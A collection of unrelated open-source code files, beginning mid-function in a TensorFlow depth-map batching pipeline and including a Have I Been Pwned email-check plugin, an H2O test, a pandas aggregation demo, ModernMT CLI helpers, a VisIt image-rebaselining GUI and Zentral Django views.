enqueue_cond = tf.logical_and(tf.less(n_holes, output_height*output_width*2/3), tf.less(diff_mean, diff_th))
def zero_img():
return tf.constant(0, shape=[0, output_height, output_width, n_concat])
def one_img():
# Data augmentation: rand_flip, rand_scale and rand_depth_shift on filtered patches.
raw = tf.clip_by_value(depth_raw_im, low_th, up_th)
ref = tf.clip_by_value(depth_ref_im, low_th, up_th)
if rand_brightness:
color = tf.image.random_brightness(color_im, 20)
else:
color = color_im
if rand_depth_shift:
raw, ref = rand_shift_depth([raw, ref], low_th, up_th)
if has_mask and has_abd:
im = tf.concat([raw, ref, color, mask, abd], axis=2)
elif has_mask:
im = tf.concat([raw, ref, color, mask], axis=2)
else:
im = tf.concat([raw, ref, color], axis=2)
if rand_flip:
im = tf.image.random_flip_left_right(im)
if rand_scale:
pass
return tf.expand_dims(im, 0)
concated_im = tf.cond(enqueue_cond, one_img, zero_img)
## Pass the 4D batch tensors to a batching op at the end of input data queue
# shuffle_batch creates a shuffling queue with dequeue op and enqueue QueueRunner
# min_after_dequeue defines how big a buffer we will randomly sample from
# bigger means better shuffling but slower start up and more memory used.
# capacity must be larger than min_after_dequeue and the amount larger
# determines the maximum we will prefetch.
# capacity = min_after_dequeue + (num_threads + small_safety_margin) * batch_size
if use_shuffle_batch:
capacity = min_after_dequeue + (num_threads + 1) * batch_size
im_batch = tf.train.shuffle_batch(
[concated_im],
batch_size=batch_size,
capacity=capacity,
enqueue_many=True,
num_threads=num_threads,
min_after_dequeue=min_after_dequeue,
allow_smaller_final_batch=True,
name="shuffle_batch")
else:
im_batch = tf.train.batch(
[concated_im],
batch_size=batch_size,
num_threads=num_threads,
allow_smaller_final_batch=True,
enqueue_many=True,
name="batch")
# Split concatenated data
if has_mask and has_abd:
depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch = tf.split(im_batch, n_concat, axis=3)
elif has_mask:
depth_raw_batch, depth_ref_batch, color_batch, mask_batch = tf.split(im_batch, n_concat, axis=3)
else: # get mask only from ref(after clip, outliers are equal to low_th)
depth_raw_batch, depth_ref_batch, color_batch = tf.split(im_batch, n_concat, axis=3)
mask_batch = tf.cast(tf.not_equal(depth_ref_batch, low_th), tf.float32, name='mask_batch') # 0.0 or 1.0
# Normalize depth and color maps
with tf.name_scope('normalize'):
thres_range = (up_th - low_th) / 2.0
depth_raw_batch = (depth_raw_batch - low_th) / thres_range
depth_raw_batch = tf.subtract(depth_raw_batch, 1.0, name='raw_batch') # [low,up]->[-1,1]
depth_ref_batch = (depth_ref_batch - low_th) / thres_range
depth_ref_batch = tf.subtract(depth_ref_batch, 1.0, name='ref_batch') # [low,up]->[-1,1]
color_batch = color_batch * mask_batch / 127.0
color_batch = tf.subtract(color_batch, 1.0, name='aux_batch') # [0,255]->[-1,1]
if has_abd:
albedo_batch = albedo_batch / 127.0 # offline estimated albedo from RGB, [0,255]->[0,2]
else:
albedo_batch = None
# dbg: return and show last diff_mean in batch
return depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch, diff_mean
|
core/plugins/hibp.py | area55git/Gitmails | 140 | 30134 | import time
import requests
from core.utils.parser import Parser
from core.utils.helpers import Helpers
from core.models.plugin import BasePlugin
class HIBP(BasePlugin):
def __init__(self, args):
self.args = args
self.base_url = "https://haveibeenpwned.com/api/v2/breachedaccount"
self.url_parameters = "truncateResponse=true&includeUnverified=true"
def execute(self, data):
Helpers.print_warning("Starting Have I Been Pwned plugin...", jumpline=True)
all_emails = Parser(self.args).all_unique_emails(data)
if all_emails:
self.check_all_emails(all_emails)
return True
return False
def check_authors(self, authors):
for author in authors:
time.sleep(2)
self.check_email(author.email)
def check_all_emails(self, emails):
for email in emails:
time.sleep(2)
self.check_email(email)
def check_email(self, email):
try:
url = "{}/{}?{}".format(self.base_url, email, self.url_parameters)
r = requests.get(url)
if r.status_code == 503:
Helpers.print_error("hibp: IP got in DDoS protection by CloudFare")
elif r.status_code == 429:
Helpers.print_error("hibp: Throttled by HIBP API")
elif r.text:
r = r.json()
print("\n{} leaks:".format(email))
for leak in r:
print("\t- {}".format(leak["Name"]))
return True
return False
except Exception as e:
Helpers.print_error(e)
return False
|
ml_metadata/workspace.bzl | zijianjoy/ml-metadata | 458 | 30136 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ML METADATA Data Validation external dependencies that can be loaded in WORKSPACE files.
"""
load("//ml_metadata:mysql_configure.bzl", "mysql_configure")
def ml_metadata_workspace():
"""All ML Metadata external dependencies."""
mysql_configure()
|
h2o-py/tests/testdir_misc/pyunit_pubdev_7506_model_download_with_cv.py | vishalbelsare/h2o-3 | 6,098 | 30188 | <filename>h2o-py/tests/testdir_misc/pyunit_pubdev_7506_model_download_with_cv.py<gh_stars>1000+
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import h2o
import os
from h2o.estimators.gbm import H2OGradientBoostingEstimator
from tests import pyunit_utils
def model_download_with_cv():
prostate = h2o.import_file(pyunit_utils.locate("smalldata/prostate/prostate.csv"))
prostate["CAPSULE"] = prostate["CAPSULE"].asfactor()
prostate_gbm = H2OGradientBoostingEstimator(nfolds=2, keep_cross_validation_predictions=True)
prostate_gbm.train(x=["AGE", "RACE", "PSA", "DCAPS"], y="CAPSULE", training_frame=prostate)
path = pyunit_utils.locate("results")
model_path = h2o.download_model(prostate_gbm, path=path, export_cross_validation_predictions=True)
assert os.path.isfile(model_path), "Expected model artifact {0} to exist, but it does not.".format(model_path)
h2o.remove_all()
prostate_gbm_reloaded = h2o.upload_model(model_path)
assert isinstance(prostate_gbm_reloaded, H2OGradientBoostingEstimator), \
"Expected H2OGradientBoostingEstimator, but got {0}".format(prostate_gbm_reloaded)
holdout_frame_id = prostate_gbm.cross_validation_holdout_predictions().frame_id
assert h2o.get_frame(holdout_frame_id) is not None
if __name__ == "__main__":
pyunit_utils.standalone_test(model_download_with_cv)
else:
model_download_with_cv()
|
notebook/pandas_agg.py | vhn0912/python-snippets | 174 | 30194 | import pandas as pd
import numpy as np
print(pd.__version__)
# 1.0.0
print(pd.DataFrame.agg is pd.DataFrame.aggregate)
# True
df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]})
print(df)
# A B
# 0 0 3
# 1 1 4
# 2 2 5
print(df.agg(['sum', 'mean', 'min', 'max']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
# min 0.0 3.0
# max 2.0 5.0
print(type(df.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg(['sum']))
# A B
# sum 3 12
print(type(df.agg(['sum'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg('sum'))
# A 3
# B 12
# dtype: int64
print(type(df.agg('sum')))
# <class 'pandas.core.series.Series'>
print(df.agg({'A': ['sum', 'min', 'max'],
'B': ['mean', 'min', 'max']}))
# A B
# max 2.0 5.0
# mean NaN 4.0
# min 0.0 3.0
# sum 3.0 NaN
print(df.agg({'A': 'sum', 'B': 'mean'}))
# A 3.0
# B 4.0
# dtype: float64
print(df.agg({'A': ['sum'], 'B': ['mean']}))
# A B
# mean NaN 4.0
# sum 3.0 NaN
print(df.agg({'A': ['min', 'max'], 'B': 'mean'}))
# A B
# max 2.0 NaN
# mean NaN 4.0
# min 0.0 NaN
print(df.agg(['sum', 'mean', 'min', 'max'], axis=1))
# sum mean min max
# 0 3.0 1.5 0.0 3.0
# 1 5.0 2.5 1.0 4.0
# 2 7.0 3.5 2.0 5.0
s = df['A']
print(s)
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(s.agg(['sum', 'mean', 'min', 'max']))
# sum 3.0
# mean 1.0
# min 0.0
# max 2.0
# Name: A, dtype: float64
print(type(s.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.series.Series'>
print(s.agg(['sum']))
# sum 3
# Name: A, dtype: int64
print(type(s.agg(['sum'])))
# <class 'pandas.core.series.Series'>
print(s.agg('sum'))
# 3
print(type(s.agg('sum')))
# <class 'numpy.int64'>
print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'}))
# Total 3.0
# Average 1.0
# Min 0.0
# Max 2.0
# Name: A, dtype: float64
# print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']}))
# SpecificationError: nested renamer is not supported
print(df.agg(['mad', 'amax', 'dtype']))
# A B
# mad 0.666667 0.666667
# amax 2 5
# dtype int64 int64
print(df['A'].mad())
# 0.6666666666666666
print(np.amax(df['A']))
# 2
print(df['A'].dtype)
# int64
# print(df.agg(['xxx']))
# AttributeError: 'xxx' is not a valid function for 'Series' object
# print(df.agg('xxx'))
# AttributeError: 'xxx' is not a valid function for 'DataFrame' object
print(hasattr(pd.DataFrame, '__array__'))
# True
print(hasattr(pd.core.groupby.GroupBy, '__array__'))
# False
print(df.agg([np.sum, max]))
# A B
# sum 3 12
# max 2 5
print(np.sum(df['A']))
# 3
print(max(df['A']))
# 2
print(np.abs(df['A']))
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(df.agg([np.abs]))
# A B
# absolute absolute
# 0 0 3
# 1 1 4
# 2 2 5
# print(df.agg([np.abs, max]))
# ValueError: cannot combine transform and aggregation operations
def my_func(x):
return min(x) / max(x)
print(df.agg([my_func, lambda x: min(x) / max(x)]))
# A B
# my_func 0.0 0.6
# <lambda> 0.0 0.6
print(df['A'].std())
# 1.0
print(df['A'].std(ddof=0))
# 0.816496580927726
print(df.agg(['std', lambda x: x.std(ddof=0)]))
# A B
# std 1.000000 1.000000
# <lambda> 0.816497 0.816497
print(df.agg('std', ddof=0))
# A 0.816497
# B 0.816497
# dtype: float64
print(df.agg(['std'], ddof=0))
# A B
# std 1.0 1.0
df_str = df.assign(C=['X', 'Y', 'Z'])
print(df_str)
# A B C
# 0 0 3 X
# 1 1 4 Y
# 2 2 5 Z
# df_str['C'].mean()
# TypeError: Could not convert XYZ to numeric
print(df_str.agg(['sum', 'mean']))
# A B C
# sum 3.0 12.0 XYZ
# mean 1.0 4.0 NaN
print(df_str.agg(['mean', 'std']))
# A B
# mean 1.0 4.0
# std 1.0 1.0
print(df_str.agg(['sum', 'min', 'max']))
# A B C
# sum 3 12 XYZ
# min 0 3 X
# max 2 5 Z
print(df_str.select_dtypes(include='number').agg(['sum', 'mean']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
|
cli/mmt/mmtcli.py | Centaurioun/modernmt | 154 | 30206 | <reponame>Centaurioun/modernmt
import os
import re
from cli.mmt import MMT_HOME_DIR, MMT_LIB_DIR, MMT_BIN_DIR, MMT_JAR, MMT_PLUGINS_JARS
from cli.utils import osutils
def __get_java_version():
try:
stdout, stderr = osutils.shell_exec(['java', '-version'])
java_output = stdout + '\n' + stderr
for line in java_output.split('\n'):
tokens = line.split()
if 'version' in tokens:
version = tokens[tokens.index('version') + 1]
version = version.strip('"')
if version.startswith('1.'):
version = version[2:]
version = re.match('^[0-9]+', version)
return int(version.group())
return None
except OSError:
return None
__java_version = __get_java_version()
assert __java_version is not None, 'missing Java executable, please check INSTALL.md'
assert __java_version > 7, 'wrong version of Java: required Java 8 or higher'
def mmt_env():
llp = (MMT_LIB_DIR + os.pathsep + os.environ['LD_LIBRARY_PATH']) if 'LD_LIBRARY_PATH' in os.environ else MMT_LIB_DIR
return dict(os.environ, LD_LIBRARY_PATH=llp, LC_ALL='C.UTF-8', LANG='C.UTF-8')
if 'MMT_HOME' not in os.environ:
os.environ['MMT_HOME'] = MMT_HOME_DIR
# - ModernMT CLI functions ---------------------------------------------------------------------------------------------
def mmt_java(main_class, args=None, *,
java_ops=None, remote_debug=False, max_heap_mb=None, server=False, logs_path=None):
java_ops = java_ops or []
if remote_debug:
java_ops.append('-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005')
if server:
java_ops.append('-server')
if max_heap_mb is not None:
java_ops.append('-Xms' + str(max_heap_mb) + 'm')
java_ops.append('-Xmx' + str(max_heap_mb) + 'm')
if logs_path is not None:
java_ops += ['-XX:ErrorFile=' + os.path.join(logs_path, 'hs_err_pid%p.log')]
java_ops += ['-XX:+PrintGCDateStamps', '-verbose:gc', '-XX:+PrintGCDetails',
'-Xloggc:' + os.path.join(logs_path, 'gc.log')]
java_ops += ['-XX:+HeapDumpOnOutOfMemoryError', '-XX:HeapDumpPath=' + logs_path]
java_ops += ['-XX:+CMSClassUnloadingEnabled', '-XX:+UseConcMarkSweepGC', '-XX:+CMSParallelRemarkEnabled',
'-XX:+UseCMSInitiatingOccupancyOnly', '-XX:CMSInitiatingOccupancyFraction=70',
'-XX:+ScavengeBeforeFullGC', '-XX:+CMSScavengeBeforeRemark', '-XX:+CMSClassUnloadingEnabled',
'-XX:+ExplicitGCInvokesConcurrentAndUnloadsClasses']
else:
if max_heap_mb is not None:
java_ops.append('-Xmx' + str(max_heap_mb) + 'm')
classpath = ':'.join([MMT_JAR] + MMT_PLUGINS_JARS)
java_cmd = ['java'] + java_ops + \
['-cp', classpath, '-Dmmt.home=' + MMT_HOME_DIR, '-Djava.library.path=' + MMT_LIB_DIR, main_class]
if args is not None:
java_cmd += args
return java_cmd
def mmt_tmsclean(src_lang, tgt_lang, in_path, out_path, out_format=None, filters=None):
args = ['-s', src_lang, '-t', tgt_lang, '--input', in_path, '--output', out_path]
if out_format is not None:
args += ['--output-format', out_format]
if filters is not None and len(filters) > 0:
args += ['--filters'] + filters
extended_heap_mb = int(osutils.mem_size() * 90 / 100)
java_ops = ['-DentityExpansionLimit=0', '-DtotalEntitySizeLimit=0', '-Djdk.xml.totalEntitySizeLimit=0']
command = mmt_java('eu.modernmt.cli.CleaningPipelineMain', args, max_heap_mb=extended_heap_mb, java_ops=java_ops)
osutils.shell_exec(command, env=mmt_env())
def mmt_preprocess(src_lang, tgt_lang, in_paths, out_path, dev_path=None, test_path=None,
partition_size=None, quiet=False):
args = ['-s', src_lang, '-t', tgt_lang, '--output', out_path, '--input']
if isinstance(in_paths, str):
in_paths = [in_paths]
args += in_paths
if partition_size is not None:
args += ['--size', str(partition_size)]
if dev_path is not None:
args += ['--dev', dev_path]
if test_path is not None:
args += ['--test', test_path]
if quiet:
args.append('--quiet')
command = mmt_java('eu.modernmt.cli.TrainingPipelineMain', args)
osutils.shell_exec(command, env=mmt_env())
def mmt_dedup(src_lang, tgt_lang, in_path, out_path, length_threshold=None, sort=None):
args = ['-s', src_lang, '-t', tgt_lang, '--input', in_path, '--output', out_path]
if length_threshold is not None and length_threshold > 0:
args += ['-l', length_threshold]
if sort is not None:
args += ['--sort'] + sort
command = mmt_java('eu.modernmt.cli.DeduplicationMain', args)
osutils.shell_exec(command, env=mmt_env())
# - Fastalign CLI functions --------------------------------------------------------------------------------------------
def fastalign_build(src_lang, tgt_lang, in_path, out_model, iterations=None,
case_sensitive=True, favor_diagonal=True, log=None):
os.makedirs(out_model, exist_ok=True)
out_model = os.path.join(out_model, '%s__%s.fam' % (src_lang, tgt_lang))
if log is None:
log = osutils.DEVNULL
command = [os.path.join(MMT_BIN_DIR, 'fa_build'), '-s', src_lang, '-t', tgt_lang, '-i', in_path, '-m', out_model]
if iterations is not None:
command.extend(['-I', str(iterations)])
if not case_sensitive:
command.append('--case-insensitive')
if not favor_diagonal:
command.append('--no-favor-diagonal')
osutils.shell_exec(command, stdout=log, stderr=log, env=mmt_env())
def fastalign_score(src_lang, tgt_lang, model_path, in_path, out_path=None):
model_path = os.path.join(model_path, '%s__%s.fam' % (src_lang, tgt_lang))
command = [os.path.join(MMT_BIN_DIR, 'fa_score'), '-s', src_lang, '-t', tgt_lang,
'-m', model_path, '-i', in_path, '-o', out_path or in_path]
stdout, _ = osutils.shell_exec(command, env=mmt_env())
result = dict()
for line in stdout.splitlines(keepends=False):
key, value = line.split('=', maxsplit=1)
result[key] = float(value)
return result['good_avg'], result['good_std_dev'], result['bad_avg'], result['bad_std_dev']
|
seno/wallet/trading/trade_status.py | emilson0407/seno-blockchain | 11,902 | 30226 | from enum import Enum
class TradeStatus(Enum):
PENDING_ACCEPT = 0
PENDING_CONFIRM = 1
PENDING_CANCEL = 2
CANCELED = 3
CONFIRMED = 4
FAILED = 5
|
src/test/rebaseline-p.py | visit-dav/vis | 226 | 30238 | import filecmp
import os
import sys
import shutil
import subprocess
import time
import unittest
if (sys.version_info > (3, 0)):
import urllib.request, urllib.parse, urllib.error
else:
import urllib
from optparse import OptionParser
from PyQt4 import QtCore,QtGui
parser = OptionParser()
parser.add_option("-r", "--root", dest="web_root",
default="http://portal.nersc.gov/project/visit/",
help="Root of web URL where baselines are")
parser.add_option("-d", "--date", dest="web_date",
help="Date of last good run, in YYMonDD form")
parser.add_option("-m", "--mode", dest="mode",
help="Mode to run in: serial, parallel, sr")
parser.add_option("-w", "--web-url", dest="web_url",
help="Manual URL specification; normally generated "
"automatically based on (-r, -d, -m)")
parser.add_option("-g", "--git", dest="git", action="store_true",
help="Use git to ignore images with local modifications")
parser.add_option("-s", "--svn", dest="svn", action="store_true",
help="Use svn to ignore images with local modifications")
(options, args) = parser.parse_args()
if options.web_url is not None:
uri = options.web_url
else:
uri = options.web_root + options.web_date + "/"
mode = ""
if options.mode == "sr" or options.mode == "scalable,parallel" or \
options.mode == "scalable_parallel":
mode="davinci_scalable_parallel_icet"
else:
mode="".join([ s for s in ("davinci_", options.mode) ])
uri += mode + "/"
parser.destroy()
print("uri:", uri)
class MW(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
def real_dirname(path):
"""Python's os.path.dirname is not dirname."""
return path.rsplit('/', 1)[0]
def real_basename(path):
"""Python's os.path.basename is not basename."""
if path.rsplit('/', 1)[1] is '': return None
return path.rsplit('/', 1)[1]
def baseline_current(serial_baseline):
"""Given the path to the serial baseline image, determine if there is a mode
specific baseline. Return a 2-tuple of the baseline image and the path to
the 'current' image."""
dname = real_dirname(serial_baseline)
bname = real_basename(serial_baseline)
baseline = serial_baseline
if options.mode is not None:
# Check for a mode specific baseline.
mode_spec = os.path.join(dname + "/", options.mode + "/", bname)
if os.path.exists(mode_spec):
baseline = mode_spec
# `Current' image never has a mode-specific path; filename/dir is always
# based on the serial baseline's directory.
no_baseline = serial_baseline.split('/', 1) # path without "baseline/"
current = os.path.join("current/", no_baseline[1])
return (baseline, current)
def mode_specific(baseline):
"""Given a baseline image path, return a path to the mode specific baseline,
even if said baseline does not exist (yet)."""
if options.mode is None or options.mode == "serial":
return baseline
dname = real_dirname(baseline)
bname = real_basename(baseline)
if options.mode == "parallel":
if baseline.find("/parallel") != -1:
# It's already got parallel in the path; this IS a mode specific
# baseline.
return baseline
return os.path.join(dname, options.mode, bname)
if options.mode.find("scalable") != -1:
if baseline.find("scalable_parallel") != -1:
# Already is mode-specific.
return baseline
return os.path.join(dname, "scalable_parallel", bname)
# Ruh roh. options.mode must be garbage.
raise NotImplementedError("Unknown mode '%s'" % options.mode)
def local_modifications_git(file):
vcs_diff = subprocess.call(["git", "diff", "--quiet", file])
if vcs_diff == 1:
return True
return False
def local_modifications_svn(file):
svnstat = subprocess.Popen("svn stat %s" % file, shell=True,
stdout=subprocess.PIPE)
diff = svnstat.communicate()[0]
if diff != '':
return True
return False
def local_modifications(filepath):
"""Returns true if the file has local modifications. Always false if the
user did not supply the appropriate VCS option."""
if options.git: return local_modifications_git(filepath)
if options.svn: return local_modifications_svn(filepath)
return False
def equivalent(baseline, image):
"""True if the files are the same."""
if not os.path.exists(image): return False
# Note this is `shallow' by default, but that's fine for our usage.
return filecmp.cmp(baseline, image)
def trivial_pass(baseline, image):
"""True if we can determine that this image is OK without querying the
network."""
return equivalent(baseline, image) or local_modifications(baseline)
class RebaselinePTests(unittest.TestCase):
def test_dirname(self):
input_and_results = [
("baseline/category/test/a.png", "baseline/category/test"),
("b/c/t/q.png", "b/c/t"),
("b/c/t/longfn.png", "b/c/t"),
("b/c/t/", "b/c/t")
]
for tst in input_and_results:
self.assertEqual(real_dirname(tst[0]), tst[1])
def test_basename(self):
input_and_results = [
("baseline/category/test/a.png", "a.png"),
("b/c/t/q.png", "q.png"),
("b/c/t/longfn.png", "longfn.png"),
("b/c/t/", None)
]
for tst in input_and_results:
self.assertEqual(real_basename(tst[0]), tst[1])
class Image(QtGui.QWidget):
def __init__(self, path, parent=None):
self._filename = path
self._parent = parent
self._display = QtGui.QLabel(self._parent)
self._load()
def _load(self):
pixmap = QtGui.QPixmap(300,300)
pixmap.load(self._filename)
self._display.resize(pixmap.size())
self._display.setPixmap(pixmap)
def widget(self): return self._display
def width(self): return self._display.width()
def height(self): return self._display.height()
def update(self, path):
self._filename = path
self._load()
class Layout(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self._mainwin = parent
self._mainwin.statusBar().insertPermanentWidget(0,QtGui.QLabel())
self.status("Initializing...")
quit = QtGui.QPushButton('Quit', self)
quit.setMaximumWidth(80)
if parent is None: parent = self
parent.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,
QtCore.SLOT('quit()'))
parent.connect(self, QtCore.SIGNAL('closeApp()'), self._die)
self._init_signals()
self._bugs = [] # list which keeps track of which images we think are bugs.
# guess an initial size; we don't know a real size until we've downloaded
# images.
self.resize_this_and_mainwin(600, 600)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setFocus()
self._baseline = None
self._current = None
self._diff = None
self._images = [None, None, None]
self._next_set_of_images()
self._images[0] = Image(self._baseline, self)
self._images[1] = Image(self._current, self)
self._images[2] = Image(self._diff, self)
grid = QtGui.QGridLayout()
label_baseline = QtGui.QLabel(grid.widget())
label_current = QtGui.QLabel(grid.widget())
label_diff = QtGui.QLabel(grid.widget())
label_baseline.setText("Baseline image:")
label_current.setText("Davinci's current:")
label_diff.setText("difference between them:")
label_baseline.setMaximumSize(QtCore.QSize(160,35))
label_current.setMaximumSize(QtCore.QSize(160,35))
label_diff.setMaximumSize(QtCore.QSize(200,35))
label_directions = QtGui.QLabel(grid.widget())
label_directions.setText("Keyboard shorcuts:\n\n"
"y: yes, rebaseline\n"
"n: no, current image is wrong\n"
"u: unknown, I can't/don't want to decide now\n"
"q: quit")
label_directions.setMaximumSize(QtCore.QSize(300,300))
grid.addWidget(label_baseline, 0,0)
grid.addWidget(label_current, 0,1)
grid.addWidget(self._images[0].widget(), 1,0)
grid.addWidget(self._images[1].widget(), 1,1)
grid.addWidget(label_diff, 2,0)
grid.addWidget(quit, 2,1)
grid.addWidget(self._images[2].widget(), 3,0)
grid.addWidget(label_directions, 3,1)
rows = (
(0, (label_baseline, label_current)),
(1, (self._images[0], self._images[1])),
(2, (label_diff, quit)),
(3, (self._images[2], label_directions))
)
cols = (
(0, (label_baseline, self._images[0], label_diff, self._images[2])),
(1, (label_current, self._images[1], quit, label_directions))
)
for r in rows:
grid.setRowMinimumHeight(r[0], max([x.height() for x in r[1]]))
for c in cols:
grid.setColumnMinimumWidth(c[0], max([x.height() for x in c[1]]))
self.setLayout(grid)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.show()
self.setFocus()
def resize_this_and_mainwin(self, w, h):
self.resize(w,h)
# make sure it can't shrink too much
self._mainwin.setMinimumWidth(w)
self._mainwin.setMinimumHeight(h+30) # +30: for the status bar
# try not to resize the mainwin if we don't need to; it's annoying.
cur_w = self._mainwin.width()
cur_h = self._mainwin.height()
self._mainwin.resize(max(w,cur_w), max(h,cur_h))
self._mainwin.update()
def _die(self):
print("You thought these test results were bugs:")
for f in self._bugs:
print("\t", f)
self._mainwin.close()
def calc_width(self):
w = 0
for col in range(0,self.layout().columnCount()):
w += self.layout().columnMinimumWidth(col)
return w
def calc_height(self):
h = 0
for row in range(0,self.layout().rowCount()):
h += self.layout().rowMinimumHeight(row)
return h
def _update_images(self):
self._images[0].update(self._baseline)
self._images[1].update(self._current)
self._images[2].update(self._diff)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.update()
def _rebaseline(self):
self.status("".join(["rebaselining ", self._current, "..."]))
baseline = mode_specific(self._baseline)
print("moving", self._current, "on top of", baseline)
# We might be creating the first mode specific baseline for that test. If
# so, it'll be missing the baseline specific dir.
if not os.path.exists(real_dirname(baseline)):
print(real_dirname(baseline), "does not exist, creating...")
os.mkdir(real_dirname(baseline))
shutil.move(self._current, baseline) # do the rebaseline!
self._next_set_of_images()
self._update_images()
def _ignore(self):
self.status("".join(["ignoring ", self._baseline, "..."]))
self._bugs.append(self._baseline)
self._next_set_of_images()
self._update_images()
def _unknown(self):
self.status("".join(["unknown ", self._baseline, "..."]))
self._next_set_of_images()
self._update_images()
def status(self, msg):
self._mainwin.statusBar().showMessage(msg)
self._mainwin.statusBar().update()
QtCore.QCoreApplication.processEvents() # we're single threaded
def _next_set_of_images(self):
"""Figures out the next set of images to display. Downloads 'current' and
'diff' results from davinci. Sets filenames corresponding to baseline,
current and diff images."""
if self._baseline is None: # first call, build list.
self._imagelist = []
print("Building initial file list... please wait.")
self.status("Building initial file list... please wait.")
for root, dirs, files in os.walk("baseline"):
for f in files:
fn, ext = os.path.splitext(f)
if ext == ".png":
# In some cases, we can trivially reject a file. Don't bother
# adding it to our list in that case.
serial_baseline_fn = os.path.join(root, f)
# Does this path contain "parallel" or "scalable_parallel"? Then
# we've got a mode specific baseline. We'll handle those based on
# the serial filenames, so ignore them for now.
if serial_baseline_fn.find("parallel") != -1: continue
baseline_fn, current_fn = baseline_current(serial_baseline_fn)
assert os.path.exists(baseline_fn)
if not trivial_pass(baseline_fn, current_fn):
self._imagelist.append(baseline_fn)
try:
while len(self._imagelist) > 0:
self._baseline = self._imagelist.pop()
# now derive other filenames based on that one.
filename = None
# os.path.split fails if there's no /
try:
filename = os.path.split(self._baseline)
filename = filename[1]
except AttributeError as e:
self.status("No slash!")
break
current_url = uri + "/c_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(current_url, "local_current.png")
else:
f,info = urllib.urlretrieve(current_url, "local_current.png")
self.status("".join(["Checking ", current_url, "..."]))
if info.getheader("Content-Type").startswith("text/html"):
# then it's a 404 or other error; skip this image.
continue
else:
# We found the next image.
self._current = "local_current.png"
diff_url = uri + "/d_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(diff_url, "local_diff.png")
else:
f,info = urllib.urlretrieve(diff_url, "local_diff.png")
if info.getheader("Content-Type").startswith("text/html"):
raise Exception("Could not download diff image.")
self._diff = "local_diff.png"
self.status("Waiting for input on " + filename)
break
except KeyError as e:
print(e)
print("No more images!")
self.emit(QtCore.SIGNAL('closeApp()'))
def _init_signals(self):
self.connect(self, QtCore.SIGNAL('rebaseline()'), self._rebaseline)
self.connect(self, QtCore.SIGNAL('ignore()'), self._ignore)
self.connect(self, QtCore.SIGNAL('unknown()'), self._unknown)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Q:
self.emit(QtCore.SIGNAL('closeApp()'))
if event.key() == QtCore.Qt.Key_Y:
self.emit(QtCore.SIGNAL('rebaseline()'))
if event.key() == QtCore.Qt.Key_N:
self.emit(QtCore.SIGNAL('ignore()'))
if event.key() == QtCore.Qt.Key_U:
self.emit(QtCore.SIGNAL('unknown()'))
QtCore.QCoreApplication.processEvents()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests)
results = unittest.TextTestRunner(verbosity=2).run(suite)
if not results.wasSuccessful():
print("Tests failed, bailing.")
sys.exit(1)
app = QtGui.QApplication(sys.argv)
mw = MW()
mw.show()
mw.setWindowTitle("visit rebaseline -p")
layout = Layout(mw)
layout.show()
sys.exit(app.exec_())
|
server/base/views.py | arubdesu/zentral | 634 | 30267 | import logging
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404, HttpResponse, JsonResponse
from django.views.generic import TemplateView, View
from zentral.core.stores import frontend_store
logger = logging.getLogger("server.base.views")
class HealthCheckView(View):
def get(self, request, *args, **kwargs):
return HttpResponse('OK')
class IndexView(LoginRequiredMixin, TemplateView):
template_name = "base/index.html"
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
app_list = []
for app_name, app_config in apps.app_configs.items():
if getattr(app_config, "events_module", None) is not None:
app_list.append(app_name)
app_list.sort()
context["apps"] = app_list
return context
class AppHistogramDataView(LoginRequiredMixin, View):
INTERVAL_DATE_FORMAT = {
"hour": "%H:%M",
"day": "%d/%m",
"week": "%d/%m",
"month": "%m/%y",
}
def get(self, request, *args, **kwargs):
app = kwargs['app']
try:
zentral_app = apps.app_configs[app]
search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT")
except (KeyError, AttributeError):
raise Http404
interval = kwargs["interval"]
try:
date_format = self.INTERVAL_DATE_FORMAT[interval]
except KeyError:
raise Http404
labels = []
event_count_data = []
unique_msn_data = []
for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]),
**search_dict):
labels.append(dt.strftime(date_format))
event_count_data.append(event_count)
unique_msn_data.append(unique_msn)
datasets = {"event_count": {
"label": "{} events".format(app),
"backgroundColor": "rgba(122, 182, 160, 0.7)",
"data": event_count_data
},
"unique_msn": {
"label": "{} machines".format(app),
"backgroundColor": "rgba(225, 100, 86, 0.7)",
"data": unique_msn_data
}}
return JsonResponse({"app": app,
"labels": labels,
"datasets": datasets})
|
